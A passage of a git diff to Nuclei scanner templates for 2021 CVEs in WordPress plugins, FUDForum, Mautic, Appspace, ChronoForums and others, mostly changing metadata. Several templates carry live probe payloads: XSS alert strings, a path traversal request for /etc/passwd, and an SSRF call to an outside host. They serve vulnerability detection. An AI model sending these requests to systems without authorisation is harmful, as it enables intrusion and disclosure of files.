"{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + words: + - "" + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-26754.yaml b/nuclei-templates/CVE-2021/CVE-2021-26754.yaml index 2cbc6e90a0..e46b168f1d 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-26754.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-26754.yaml @@ -1,31 +1,46 @@ id: CVE-2021-26754 info: - name: wpDataTables < 3.4.1 - Unauthenticated SQL Injection - author: akincibor - severity: critical - description: In the default configuration, a simple table can be published in a page that does not require authentication. The table can be searched, and is vulnerable to SQL Injection via the order parameter. An unauthenticated user visiting the page where the table is published can perform a SQL injection attack in the table search parameter order[0][dir]. + name: > + wpDataTables (Premium) <= 3.4 - SQL Injection + author: topscoder + severity: high + description: > + wpDataTables before 3.4.1 mishandles order direction for server-side tables, aka admin-ajax.php?action=get_wdtable order[0][dir] SQL injection. Please note that this only affects the premium version of the plugin which shares the same slug as the free version. reference: - - https://wpscan.com/vulnerability/bfd0cfd9-0d6a-47bb-9d73-762ddc138129 - tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth + - https://www.wordfence.com/threat-intel/vulnerabilities/id/775e9f94-b66d-4c22-81ef-c335c0654f08?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-26754 + metadata: + fofa-query: "wp-content/plugins/wpdatatables/" + google-query: inurl:"/wp-content/plugins/wpdatatables/" + shodan-query: 'vuln:CVE-2021-26754' + tags: cve,wordpress,wp-plugin,wpdatatables,high -requests: +http: - method: GET + redirects: true + max-redirects: 3 path: - - '{{BaseURL}}/wp-content/plugins/wpdatatables/readme.txt' + - "{{BaseURL}}/wp-content/plugins/wpdatatables/readme.txt" extractors: - type: regex name: version - internal: true + part: body group: 1 + internal: true regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" - type: regex + name: version + part: body group: 1 regex: - - "(?m)Stable tag: ([0-9.]+)" + - "(?mi)Stable tag: ([0-9.]+)" matchers-condition: and matchers: @@ -35,9 +50,9 @@ requests: - type: word words: - - "wpDataTables" + - "wpdatatables" part: body - type: dsl dsl: - - compare_versions(version, '< 3.4.1') \ No newline at end of file + - compare_versions(version, '<= 3.4') \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27124.yaml b/nuclei-templates/CVE-2021/CVE-2021-27124.yaml index 56f0a8b5a3..3818af28ba 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27124.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27124.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SQL injection in the expertise parameter in search_result.php in Doctor Appointment System v1.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 6.5 cve-id: CVE-2021-27124 cwe-id: CWE-89 - epss-score: 0.02262 - epss-percentile: 0.884 + epss-score: 0.01251 + epss-percentile: 0.85241 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system + tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project http: - raw: @@ -53,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206b581dfd4ded0340b7bfd8323a4f5fca50077b0371058bf41438a0b2b955dc0b022100cbbc6dd8bbd6ec99bd6a0420f342fc8ab8b33ea1547fa6606e7a960794be925c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a402101096ce7def9e01253aed74d686ca491e1c4b6fad1a0591a5662520cb8e02203e62bb17eb3da7850635c125c56f5cb8f51ba1520a03e9a3c04ff2998a38a8b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27309.yaml b/nuclei-templates/CVE-2021/CVE-2021-27309.yaml deleted file mode 100644 index ddfc1caa7d..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-27309.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2021-27309 - -info: - name: Clansphere CMS 2011.4 - Cross-Site Scripting - author: edoardottt - severity: medium - description: | - Clansphere CMS 2011.4 contains an unauthenticated reflected cross-site scripting vulnerability via the "module" parameter. - reference: - - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22module%22%20xss.md - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27309 - - https://nvd.nist.gov/vuln/detail/CVE-2021-27309 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-27309 - cwe-id: CWE-79 - metadata: - verified: true - tags: cve,cve2021,clansphere,xss,cms,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22>" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - '">.php' - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-27310.yaml b/nuclei-templates/CVE-2021/CVE-2021-27310.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-27310.yaml rename to nuclei-templates/CVE-2021/CVE-2021-27310.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-27314.yaml b/nuclei-templates/CVE-2021/CVE-2021-27314.yaml index 7915d433f3..597ac7088b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27314.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27314.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SQL injection in admin.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via username parameter at login page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27314 cwe-id: CWE-89 - epss-score: 0.38106 - epss-percentile: 0.96853 + epss-score: 0.25703 + epss-percentile: 0.96281 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm + tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: @@ -44,5 +46,4 @@ http: - 'status_code == 200' - 'contains(body, "Doctor Appoinment System")' condition: and - -# digest: 490a004630440220035a04a1475b1692c3fe4c175eb9210bb0ed25e840c3d671a45c91fc2471481302201ba34abef24809bd6d2f2937a771cb79ce49bb7e0696a09df8ad924bc2471d3c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207973d618635cb6ff182dd1151b2e15fef7b49ef6f6e99fbf1ef6b1f6f0f5cd64022038423bf061c1df525cfb84ab33d32f3681ff677745b0341ea30b995d34b637b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27315.yaml b/nuclei-templates/CVE-2021/CVE-2021-27315.yaml index 9dad2b336d..257541a2b4 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27315.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27315.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via the comment parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27315 cwe-id: CWE-89 - epss-score: 0.08344 - epss-percentile: 0.93733 + epss-score: 0.06768 + epss-percentile: 0.93718 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm + tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: @@ -44,5 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and - -# digest: 4a0a00473045022033c2dbcc836294dc1e6c8680f53361c68b4022cf6e8b9f9714d2a2a758123910022100fcabc71256976d9d6586028b190a396e68e486877b8d2c6796407d4eaca6b8a8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203675b5d024d7265ccc67751fa18a9456a08d9a6cfba7a69c677161ab2b54dc1202206a32db3d0a1aef4093b4b7de58ba04d3ca09b26a9ae9b2d325c794a17008810e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27316.yaml b/nuclei-templates/CVE-2021/CVE-2021-27316.yaml index 4ade099a34..f88a3dea84 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27316.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27316.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in doctor appointment system 1.0 allows an unauthenticated attacker to insert malicious SQL queries via lastname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27316 cwe-id: CWE-89 - epss-score: 0.08344 - epss-percentile: 0.93733 + epss-score: 0.06768 + epss-percentile: 0.93718 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm + tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: @@ -44,5 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and - -# digest: 490a0046304402207033afd0b5aeb491d2eb07f98a768fba8ae0bd2bc343b43a2fb980495202965902201757a2648224288b56f6ede000c41fd0016784c8e491fa0bfda8ae1af8745164:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205af27187e0d2039416c9a8f9600f75e28215199929e4ad988cd03e84e61c370d022100c759b577ed0406b9390cffefba1486233e1f5ebcd24930bed0d401d54a95459e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27319.yaml b/nuclei-templates/CVE-2021/CVE-2021-27319.yaml index 7dde3839a8..79a39b0365 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27319.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27319.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via email parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27319 cwe-id: CWE-89 - epss-score: 0.08344 - epss-percentile: 0.93733 + epss-score: 0.08052 + epss-percentile: 0.9371 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: packetstorm,cve,cve2021,sqli,doctor-appointment-system + tags: cve2021,cve,packetstorm,sqli,doctor-appointment-system,doctor_appointment_system_project http: - raw: @@ -44,5 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and - -# digest: 4a0a00473045022100e19ff3d17768eda25c1e2837599266d50a0827bfdeceec6a1b5b4ea089b724420220183dc45fadef939c470b4c4eb258a80a2d362bc3ed6e2cc339ab5d14e4094156:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fa576cee94b83d7c02ff3f920da22eb82e877217997d45a6843359a9ffc7662902205ede6cd0bf165f8d505aefe36928930b5e3b2e68db775a7a684c6f125a86d3e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27320.yaml b/nuclei-templates/CVE-2021/CVE-2021-27320.yaml index a2260a1e8f..260320a154 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27320.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27320.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Blind SQL injection in contactus.php in Doctor Appointment System 1.0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -17,15 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2021-27320 cwe-id: CWE-89 - epss-score: 0.095 - epss-percentile: 0.94147 + epss-score: 0.09267 + epss-percentile: 0.94102 cpe: cpe:2.3:a:doctor_appointment_system_project:doctor_appointment_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: doctor_appointment_system_project product: doctor_appointment_system - tags: cve,cve2021,sqli,doctor-appointment-system,packetstorm + tags: cve2021,cve,sqli,doctor-appointment-system,packetstorm,doctor_appointment_system_project http: - raw: @@ -44,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 4a0a0047304502200caeb28b18880aa0ad8c89fe3a0727a5835d39eb88fa6e914cab74cd695391f2022100814ffded3868c953f9b9cc6e4eb3744557c8506b5a649d348cca799b2459d9bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dd206ca7187b6ed469ca7ac639cf6d228f7811e762a78cdf8d6c89bd2defdf690220564ac31e30c8bf0db3d6b80d2f2903b35cb7fe2800fc655540dd2602b9e16acb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27519.yaml b/nuclei-templates/CVE-2021/CVE-2021-27519.yaml deleted file mode 100644 index 93e44aea56..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-27519.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2021-27519 - -info: - name: FUDForum 3.1.0 - Cross-Site Scripting - author: kh4sh3i - severity: medium - description: | - FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter. - reference: - - https://www.exploit-db.com/exploits/49942 - - https://github.com/fudforum/FUDforum/issues/2 - - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-27519 - cwe-id: CWE-79 - metadata: - shodan-query: 'http.html:"Powered by: FUDforum"' - verified: "true" - tags: xss,fudforum,edb,packetstorm,cve,cve2021 - -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/CVE-2021-27520.yaml b/nuclei-templates/CVE-2021/CVE-2021-27520.yaml index 7543816a6e..4554d3323b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27520.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27520.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability. reference: @@ -13,13 +15,14 @@ info: - https://github.com/fudforum/FUDforum/issues/2 - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2021-27520 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-27520 cwe-id: CWE-79 - epss-score: 0.00189 - epss-percentile: 0.56336 + epss-score: 0.00217 + epss-percentile: 0.59015 cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +30,7 @@ info: vendor: fudforum product: fudforum shodan-query: html:"FUDforum" - tags: packetstorm,cve,cve2021,xss,fuddorum,edb,intrusive + tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum http: - method: GET @@ -54,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f713a871379cbd2030a6ce190e44926f79118a30a186605bc734905c98ab3c9a022100d8d0638278b1dea5392ea1978536ceb4c5065a7015a5bd6887442eb53e010257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204a90f383fd73372c3a83f6f9db99d16bf93b8ee0401f22ad6088697eed2957d3022100a2c3bfa5bb7c6bc1edeeea494b9ad3a53468a5b98c9599afc9e4687efb802040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27670.yaml b/nuclei-templates/CVE-2021/CVE-2021-27670.yaml index bf9798caf2..36f6eed5f7 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27670.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27670.yaml @@ -20,25 +20,21 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27670 cwe-id: CWE-918 - epss-score: 0.61228 - epss-percentile: 0.97796 + epss-score: 0.58348 + epss-percentile: 0.97664 cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: appspace product: appspace - shodan-query: - - title:"Appspace" - - http.title:"appspace" - fofa-query: title="appspace" - google-query: intitle:"appspace" + shodan-query: title:"Appspace" tags: cve,cve2021,appspace,ssrf http: - method: GET path: - - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://{{interactsh-url}}' + - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live' matchers-condition: and matchers: @@ -50,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205415eedc43536bf50687094ab55d201c96e6d11aee855c35e9e2bd78e2a139420220127c277cdfae46eab2317d4efcda6c7096d437af1dad6d3744b5867edb1514c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210089fc67fdff5afadc5dae929f61d4b47fe38949d2e34156c446d6f3c7933a76d802204f0f7d330a006d1cc55b25bc4ec8d916a9b84081b3612e8a2745c96cae680ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-27909.yaml b/nuclei-templates/CVE-2021/CVE-2021-27909.yaml index 3472fde686..9d8da927e5 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-27909.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-27909.yaml @@ -5,20 +5,32 @@ info: author: kiransau severity: medium description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. + remediation: | + Upgrade Mautic to version 3.3.4 or later to mitigate this vulnerability. reference: - https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc - https://nvd.nist.gov/vuln/detail/CVE-2021-27909 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-27909 cwe-id: CWE-79 + epss-score: 0.00094 + epss-percentile: 0.3927 + cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: acquia + product: mautic shodan-query: title:"Mautic" - verified: "true" - tags: cve,cve2021,mautic,xss + tags: cve2021,cve,mautic,xss,acquia -requests: +http: - method: GET path: - "{{BaseURL}}/passwordreset?bundle=';alert(document.domain);var+ok='" @@ -40,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/10/17 +# digest: 4b0a00483046022100e683409a42481a5acd5030e9e2be3bff0665fbc807a45864c349a222da9660ed022100dcca043790c8a6718aacdfa104e0129441726aa52264f8642a352b641c03507c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-27931.yaml b/nuclei-templates/CVE-2021/CVE-2021-27931.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-27931.yaml rename to nuclei-templates/CVE-2021/CVE-2021-27931.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-28377.yaml b/nuclei-templates/CVE-2021/CVE-2021-28377.yaml deleted file mode 100644 index 832e5871fd..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-28377.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2021-28377 -info: - name: ChronoForums 2.0.11 - Directory Traversal - author: 0x_Akoko - severity: high - description: The ChronoForums avatar function is vulnerable through unauthenticated path traversal attacks. This enables unauthenticated attackers to read arbitrary files, like for instance Joomla's configuration file containing secret credentials. - reference: - - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L - cvss-score: 7.5 - cve-id: CVE-2021-28377 - cwe-id: CWE-200 - tags: cve,cve2021,chronoforums,lfi,joomla - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-28419.yaml b/nuclei-templates/CVE-2021/CVE-2021-28419.yaml index 92d54e7759..7ff682344f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-28419.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-28419.yaml @@ -6,6 +6,8 @@ info: severity: high description: | SEO Panel 4.8.0 is susceptible to time-based blind SQL injection via the order_col parameter in archive.php. An attacker can potentially retrieve all databases and thus obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. remediation: | Upgrade to a patched version of SEO Panel or apply the necessary security patches. reference: @@ -13,20 +15,21 @@ info: - https://www.seopanel.org/spdownload/4.8.0 - https://nvd.nist.gov/vuln/detail/CVE-2021-28419 - http://packetstormsecurity.com/files/162322/SEO-Panel-4.8.0-SQL-Injection.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-28419 cwe-id: CWE-89 epss-score: 0.17236 - epss-percentile: 0.95566 + epss-percentile: 0.95637 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: seopanel product: seo_panel - tags: cve,cve2021,sqli,seopanel,auth,packetstorm + tags: cve2021,cve,sqli,seopanel,auth,packetstorm http: - raw: @@ -55,4 +58,4 @@ http: - 'status_code_3 == 200' - 'contains(body_3, "Overall Report Summary")' condition: and -# digest: 4b0a004830460221009821011fddd161883ee909d739db7a32b8d1a6a5a176b606325638817d67a25c02210091b1d3441b2f4c822ead4c789e0141d813ca77c24db4671ea4fb1b53152a7f11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ece85ed0a3e7f7b62a57b55f6bcc77db0d19a90ecb24f30602d76c261fe03159022100f1481ca4357aab094b84c582f7d0dea2013206ee99a0d03a7ced0a91ecf93b59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-29006.yaml b/nuclei-templates/CVE-2021/CVE-2021-29006.yaml index a5b8ee428b..dee3572992 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-29006.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-29006.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-29006 cwe-id: CWE-22 epss-score: 0.09465 - epss-percentile: 0.94132 + epss-percentile: 0.94172 cpe: cpe:2.3:a:rconfig:rconfig:3.9.6:*:*:*:*:*:*:* metadata: verified: true @@ -24,7 +24,7 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" - tags: cve,cve2021,rconfig,authenticated,lfi + tags: cve2021,cve,rconfig,authenticated,lfi http: - raw: @@ -57,4 +57,4 @@ http: part: header_3 status: - 200 -# digest: 4a0a00473045022100bab9c5d2ed213fad65dd9cce4d62064dd727424c0d8b7cab32eb305966e48d9b022075d4699e3a786e8c099fe4778b9066483c3539050426a269c364e6275a53cc17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207fdb822293ed117ac244b6204a862e4cd97d7ed5b1a6da75806a95ba16942845022100cbb141a3f60efdaf36945a8ed3e93034fdb9dfa1e221d0ad775fbc7319d814a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-29484.yaml b/nuclei-templates/CVE-2021/CVE-2021-29484.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-29484.yaml rename to nuclei-templates/CVE-2021/CVE-2021-29484.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-29505.yaml b/nuclei-templates/CVE-2021/CVE-2021-29505.yaml index 0444500f06..3b35848109 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-29505.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-29505.yaml @@ -6,6 +6,8 @@ info: severity: high description: | XStream before 1.4.17 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Patched in 1.4.17. reference: - https://paper.seebug.org/1543/ @@ -18,14 +20,14 @@ info: cvss-score: 8.8 cve-id: CVE-2021-29505 cwe-id: CWE-502 - epss-score: 0.03355 - epss-percentile: 0.90349 + epss-score: 0.04677 + epss-percentile: 0.91814 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream - tags: oast,vulhub,cve,cve2021,xstream,deserialization,rce + tags: cve2021,cve,oast,vulhub,xstream,deserialization,rce,xstream_project http: - raw: @@ -112,4 +114,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100e71355e3eca1d09cab45449778e2b1ac8b5321a96c3e7b03e69f64a74add8e75022047733161c40306b2296fc6769a22db2e02e2f925ff37db0b5d16509bf6b533a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbbd8f5e47047dc1ce75b7aa5cebea7678b2035517dd765160b1b31106393cd7022100b3ecc5d68e800b780f78acdae9aa0f9f80b4d2b8778cc7a32e7fce49e0ff5c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-3002.yaml b/nuclei-templates/CVE-2021/CVE-2021-3002.yaml index 781aba2d77..fb0446244f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-3002.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-3002.yaml @@ -1,21 +1,35 @@ id: CVE-2021-3002 info: - name: Seo Panel 4.8.0 - Post based Reflected XSS + name: Seo Panel 4.8.0 - Cross-Site Scripting author: edoardottt severity: medium - description: Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter. + description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the 